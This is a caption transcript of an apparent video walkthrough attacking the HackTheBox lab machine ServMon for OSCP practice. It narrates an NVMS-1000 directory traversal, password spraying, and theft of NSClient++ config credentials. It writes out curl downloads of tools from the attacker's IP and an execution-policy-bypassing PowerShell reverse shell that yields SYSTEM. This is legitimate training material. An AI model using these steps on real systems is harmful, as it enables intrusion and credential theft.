Servmon - Hackthebox (OSCP Prep) - TJ Nulls

Captions
Hello, I'm NoxLumens. Today I'm going to be doing ServMon. Why am I doing ServMon? Because it's a part of TJ Null's list, his updated list for the OSCP, and I believe I'm going to be taking that. It looks like it's already up and running, so I'm going to clear that out, knock that down, and then we're going to start with our nmap scan like we normally do. Yes, so our IP is 10.129.227.77, and coming back... okay, so we have a lot of ports open. While it's running the script scans, or the default scripts and version enumeration, we're going to go ahead and check out this port. We're going to check out 80 as soon as I write this down. Cool, let's go check this out. Actually, I have this in my clipboard, don't I? All right, we should be better now. On page... additionally, while this is running, we can also do gobuster. We can run gobuster, do some directory busting, and let that go. I was going to say it's probably taking a long time, but it's probably taking a long time because I'm hammering it with, uh, not information, but running so much against it: the nmap scan and trying to access it. What is this? This equals route, RP login JS, V... we could do something like... gobuster found nothing: "server returned status code that matches... please exclude the status code or length," which I think is... is it exclude? It's probably just exclude length 118. Yeah, exclude length 118. So surprised, like nothing is coming back. Let's see if the scan finished. It did. Okay, let's do some stuff: grab all of this mess, all these ports and all this port information, and put it in here. I'm actually going to make a new note called nmap, see what makes it look the nicest. Okay, well, that's nice and colorful. Let's see, oh, I need to close that tab, a new tab. FTP is open: ftp 10.129.227.77, user logged in. Users Nadine and Nathan. Okay, so FTP has anonymous login enabled and we located two users, copy paste, Nadine and Nathan. Let's look in here if we can.

Holy crap, we can. Can I cat stuff? cat confidential... more confidential.txt, yes, okay. Who was that? That was Nadine. Nadine has a confidential.txt file in the FTP share. It contains this message to Nathan: "Final transfer warning... six... received... I left your password.txt file on your desktop. Please remove this once you have edited it yourself and place it back in your secure folder." Love that, of course that's how we do things around here, we always, always, always, always... What, does it not like my spelling? Maybe it doesn't like the .txt. Uh-huh, there's Nadine's, and then let's look at Nathan. Is it back? Is it like that? Yeah. cd Nathan, ls, no, cd Nathan, trying to move too fast. more "notes to do.txt": cannot find the file, that's because I don't know how to do it. It is: lock down the... upload the passwords, remove... okay, let's copy this out and actually read through it, because what I did just then was pretend to read through it for your benefit, and it is actually not going to benefit either of us. "The system cannot find the path." This, yeah, uh-huh, uh-huh, let's just move that right out of there. Notes to do: change the password for NVMS, complete. Lock down the NSClient access, got it. Upload the passwords. Remove public access to NVMS, and place the secret files in SharePoint. Okay, anything else here? Nathan. Okay, let's hop back over, see what else we've got. We know we have two users, we can go back to 80, the web server, let's see what's going on. We could try something: netexec ssh, no, smb 10.129.227.77, for me try Nathan and password of... the user share wordlist rockyou. Is that going to work? Good. "Could not decode password file," ignore password decoding, you ignore... have eight characters, okay. Oh man, can you not show me output, please? Yeah, "do not retrieve command output," no output, see what that does. Not what I wanted it to do. There's something else on here, right? Check, skip... right, check on shares, dump user targets, continue on success. No brute force? I do want to brute force. I guess I want to continue on success. I don't want any of this freaking output. I guess it'll just stop if it finds something. All right, we'll let that run.

Poor Nathan, his account, if they have a lockout policy he is locked out for days. NVMS-1000, NVMS-1000, let's look up exploits, and we see a directory traversal. Kind of lines up with what I was going to do here, is that we see like JS with the V equals... where is it going? Literally just a bunch of slashes moving up directories. Where is it checking? Is it just like the base config here, like this, so windows one... is that what they... oh no, let me go back and see what our... yeah, nothing's happening there. I want to look at gobuster, but it doesn't look like it found anything. Directory list, users, how's it finding nothing? So odd. Wordlists, gobuster, what are we looking at? Medium list. 418, imagine it's the login. Nathan, Nathan, Nadine. What happens if we choose another language? Nothing. We just look at pages. What if we do that? It'd be a mess. Another directory traversal, a lot of directory traversal, and they all seem... this is like the same thing. Is it encoding in some way? IP, return URL... this has a slash and it's also adding a slash to the first character. Okay, let's just... that's not working. We're going to go ahead and download this and then go to... not that though, this one. Okay, I'm going to say that's not coming back with anything, and we will go to up, up, and then ServMon, mkdir www and cd to www, python3, nvms... we need 10.129.227.77, we want... I don't know how to do... I'm not sure. Okay, windows... I'm just literally going to keep it the way they had it. Did it actually grab it? So what happens if we do users? Yeah, users, Nathan, desktop. What do they call the file? "Change the password, upload to the"... oh, password.txt. Desktop, password.txt, and then we'll call it passwords, lowercase, not .txt.

Oh, okay. So I wonder if it's... stop it, stop that, stop all that. I wonder if it's the user agent, or specifically what it is in this that is allowing it to work. I got rid of it, didn't I? Was this one... let's look at their request. One, traversal, two, we're setting the header, setting a custom user agent, we're setting the Accept to asterisk slash asterisk, Referer is the site, and then content equal to two. Maybe I'll come back later, or I feel like it will come back later, and check this out. So the host is vulnerable to path traversal, and it was a CVE, wasn't it? Yeah, here it is. Awfully lucky for us that they put all that information on their FTP server that allows anonymous login. Okay, let's get these into... actually, passwords, yeah, right. So that means we can do SMB, no, we can do exactly what we were doing earlier: netexec smb 10.129.227.77 -u Nathan -p passwords.txt. No? What about Nadine? Okay, oh, all right, Nadine. I'm sorry, big sucks for you. Okay, cool. And we used NetExec to password spray. NetExec password spray found credentials and we were able to locate Nadine, and then "Like Big Butts at work", I think that's what that says, like big butts at work. You have to correct me in the comments. You made it this far in, go ahead and just comment "like big butts at work" just so I know, just, you know, just so I know. I guess I didn't actually see if it was vulnerable. Here's what we can do here, maybe. One, let's see if we can log in now that we have some credentials, maybe there's more information inside. Okay, never mind. smbmap 10.129.227.77, my clipboard, "like big butts at work", me too... no, I don't, that was a horrible joke. Here we go, what is this? Oh, default shares, so not a whole lot. What about smbmap 10.129.227.77? Hopefully I still have her password in my clipboard. Copy pasta, I mean, okay, there we go, users, oh, same thing.

Yeah, okay, that was worth a shot. Let's see what else we've got running: high Windows ports, NSClient++, 8443. Let's go check 8443 out. 8443, okay. What other ports? 80, 22, that's SSH. ssh nadine@10.129.227.77, I'm so sure, and here's her password. Okay, so now we SSH on to the box: ssh nadine@10.129.227.77 with password "Like Big Butts at work", and dir, because we're on Windows. Desktop, sure, we've got the user flag: type user.txt, user flag, cool. What else, what else, what else? Let's see if that... what was it, was it 8443? Look at that: netstat -ano, netstat -ano, listening: 21, 22, 134, 566... was that in our scan previously? Actually I'm sure that it probably was. 566, but yeah, it was. Okay, let's do this instead, let's SSH, let me get my stuff pulled up for that, SSH proxy. Now we know that we can get an exit... let's see, so we'll listen on port 8443 over localhost 8443, and I think that is it, right? We just need her password, and let's see, I'm going to need to do 127.0.0.1. Actually, let's exit out of this, let's give up on that, and we'll just see what we can find on... where did he go? Wasn't it here, that plus plus or something? NSClient++ login... here it is, NSClient++, we can reach the internal network, I mean we are on it. I think I just copied that, I did. Let's get this, grab this back, let's do... I'm looking around, copy pasta, we have nothing. Let's go a-hunting. cd, what is RecData? RecData, cd RecData, dir, cd Recorded, info.db3, let me see, oh, SQLite, RecInfo, primary key.

Let's do net user Nathan, net group, groups, net localgroup, Administrators, Power Users, Backup Operators, admins. cd shared, imagine this is the FTP users. It is, just random users folder. cd, can I access Administrator? dir... oh, because I'm in freaking Users, oh my god, of course I can. dir, cd inetpub, access is denied. Okay, what about cd "Program Files"? And what do you see? This, let's look this up and see if anything exists for it: exploit, privilege escalation. Exactly what we need to do is escalate privileges. "When NSClient++ is installed with web server enabled, low-level privilege users have the ability to read the web administrator's password in clear text from the config file." Okay, let's check that out real fast. Program Files, cd NSClient++, type nsclient.ini, so then we should see some credentials in here, and we do. Documented key, go, yeah, whatever. Enumeration: we were able to locate the NSClient++ folder, config file, configuration file with credentials. There they are, along with a way to... I found this whole exploit actually. What is it even doing? It's log in and enable the following modules, including enable at startup and save config; download netcat and evil.bat to the temp directory. Is it literally just telling us to do these things: restart the computer and wait for the reverse shell? I cannot do that. What if, what if instead... so whose face changed the password? So let's check this out real fast: netexec smb 10.129.227.77 -u... type... Nathan -p, yikes, -p that password. Dirty little password sharers. Okay, that's where... searchsploit, and scripting, wait, documented key, what about... okay, well, let's just follow this for a second. I thought maybe those would work. Yeah, there's that, these were in this path, current password so secret, I love that. nscp web -- password --display, is password supposed to be the password? Oh wait, what, it just pulls out the password, okay. Log in and enable the following modules. How do I log in? Thing is, even if we can't restart the computer, maybe we can restart, I don't know, the service.

cd, dir, cd, no, temp, mkdir temp, cd temp. What else can we do? We can do something like this: /opt/ligolo, proxy, selfcert, ligolo, cd... actually we need Windows, python3, agent, agent.exe, go all the way down to temp, cd temp, and we get... we had a curl, didn't we: curl http://10.10.14.118/agent.exe -o agent.exe. Yeah, it might take a little bit. I need to pull up notes on ligolo, let's see, because we have to do a little bit of setup for... did it get it? It did, okay. Have to build the tunnel with... ligolo, we have to build the interface, whatever. We've already started the proxy server, now I need to start the agent, need to make it 10.10.14.118, connect to us, get our callback, you can see our session, we'll select the session, and then I think it's as easy as saying start. Oh, oh, oh, one of the most important things: so ligolo uses a special port number for localhost, so if you need to set it so that you can access the localhost on the victim machine, this is how you'll do it: sudo ip route add 240.0.0.1/32 dev ligolo. So now we should be able to access it.

There's a Metasploit module, let's try this. Metasploit module, see what happens. Also, can I still access this? Okay, I seem to be able to. Was this it? Okay. Options: set RHOST to 10.129.227.77, set LHOST to tun0. What else do we need? Set password to this, and I may need to change the RHOST, yeah, to 240.0.0.1. Is RPORT an option? It is. Is this going to work? Run. Oh, target is vulnerable, we knew that. Adding external script, name... reloading the application somehow, magically, and it's taking its sweet time. So yeah, payload, come on baby, big money. Oh, unfortunate that this is not working. Let's see what else, let's see what's in here. Did I kill my tunnel? I can't tell. I didn't kill the tunnel. Here we go, what does this say, where does it go? Was that this one? Okay, we need a bat file. Let's exit out of that, clear it off. ssh nadine@10.129.227.77, and her password was "like big butts at work". What? Oh, there we go, much better. All right, let's cd to C:\Temp. Okay, so we've got a couple of things in here. I guess I never ended up getting netcat on here, so let's try to do that: python3, desktop, curl http://10.10.14.118/nc.exe -o nc.exe, and there it is. nc.exe 10.10.14.118, nc -nvlp 9001... that actually might just work, let's see. "Not recognized as an internal command." C:\Temp, "not recognized as an internal or external command." We're in it, right? Sure, sure, let's get it. Something's getting rid of it. Okay, uh-huh, "the file contains a virus or PUP." So we need to bypass antivirus. What about like a PowerShell reverse shell? I'll try test.ps1, out to test.ps1. See how long this lasts. Help me.

Okay, let's go back: settings, scripts, scripts, see, add a new script. Scripts, scripts, settings, external... oh, these are settings, external scripts, scripts, PowerShell, value, desktop .ps1, and then we'll save it, though it should have already been saved. Queries, reload, "restarting, please wait while we restart." exploit1.bat, what is... is exploit1.bat, like external scripts, is... can't tell if it's working. Okay, so apparently I crashed the box. It's going to be half a second for you, but I'm going to go to bed, because I need to restart the box and it's late and I don't want to have to get back to where I was. So anyway, I will see you in half a second.

All right team, I'm here to tell you this took significantly longer than it needed to. Okay, so let's start from the top. So I've just gotten back in, and the way this works, the way the exploit works (because I had to do testing before, I tried live again because it was just taking way too long), anyway, let me show you what I have here. type test.ps1, actually you can see type test.bat, cat test.bat. Okay, so I have a PowerShell file that is a reverse shell, okay, I called it test.ps1. You can see it down here, you can see the contents of test.ps1 here. We've got the proxy running, and then you can also see a bat file, which I don't have on here yet, do I? Oh, okay, I do, there it is. Okay, so yeah, create the bat file. Here's how we have to do it: so you can't run scripts by default, we have to bypass the execution policy. So we needed a way to both bypass the execution policy and then run a file. So here's how we're doing it. In the bat file we're saying powershell.exe, so start PowerShell, execution policy bypass (you could do powershell.exe -ep bypass, same thing), window style hidden, non-interactive so we're not getting any kind of pop-ups that tell us to accept, no logo, and then file C:\Temp\test.ps1. Here it is right here. You have to have the full path. We're in cmd and we're going to run test.ps1 from there.

Once we've logged in, we're on settings, we're opening, in settings, external scripts, scripts, and then from here we would create a new one at this section. You're going to call it whatever you want, I called mine PowerShell, yikes, for no reason, PowerShell. The key, command, and then the value is the location, temp\test.ps1. All right, and then you're going to add it, then it's going to appear down here where you'll see it. So here's the key, value, right, and then there's the command that it's going to execute. Once you have this and you've saved it, you're going to click Control, because remember we have to restart the service. We can't do that, I couldn't do that, so we can restart the whole thing, right? So Control, Reload, it's going to reload the service for us, and then we're going to click on Queries. From Queries we'll go to PowerShell and then we can run the task on our own. So instead of creating a scheduled task, which I believe is what this... yes, yeah, this mentions creating a scheduled task that checks every minute and runs a command, we're not going to do it that way. We're going to run, from the Queries tab, the PowerShell script that we just had. We're going to run the PowerShell command, which, if you know, it was cmd, cmd test.bat. If we have a netcat listener running, so let's clear this out, nc -nvlp, you can already see that it tried to run the script. So if we run this we get a callback and we say whoami: we're NT AUTHORITY\SYSTEM. Okay, oh man, wow, that was rough, that was really rough. It doesn't seem rough but it took a lot of finagling, a lot of messing around. root.txt, awesome, epic, there we go. All right team, good job, you did fantastic. You can do this as well. If you have questions, put them in the comment section down below. I will see you later, have a good day.
Info
Channel: NoxLumens
Views: 943
Keywords: noxlumens, noxlumen, hacking, cyber security, oscp, oscp prep, kali linux, hacker, cyber, malware, active directory, pentesting, web app pentesting, network pentesting, ctf, cyber ctf, offsec, offsec oscp, offsec proving grounds, gobuster, ad pentesting, ad pentest, active directory pentesting, enumeration, hackthebox, netexec, tjnulls, tj nulls oscp, hackthebox servmon, ligolo-ng, ssh port forward, netclient++, how to hack, how to be a hacker, hacking for beginners
Id: AHA0CaY0cxc
Length: 55min 43sec (3343 seconds)
Published: Tue Mar 05 2024